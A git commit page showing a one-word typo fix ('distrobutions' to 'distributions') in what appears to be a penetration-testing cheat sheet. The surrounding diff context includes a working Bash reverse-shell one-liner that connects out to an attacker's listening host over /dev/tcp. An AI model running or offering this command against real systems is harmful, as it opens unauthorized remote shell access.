typo correction

This commit is contained in:
David Busby 2014-06-07 12:00:10 +01:00
parent c71945966f
commit 726f60ce32

View File

@ -115,7 +115,7 @@ cat /proc/cpuinfo
**Bash reverse shell** (@icleus)
Works on all (recent) distrobutions where egress filtering is not in place / quite open, use this to reverse connect to your listening host.
Works on all (recent) distributions where egress filtering is not in place / quite open, use this to reverse connect to your listening host.
```bash
bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &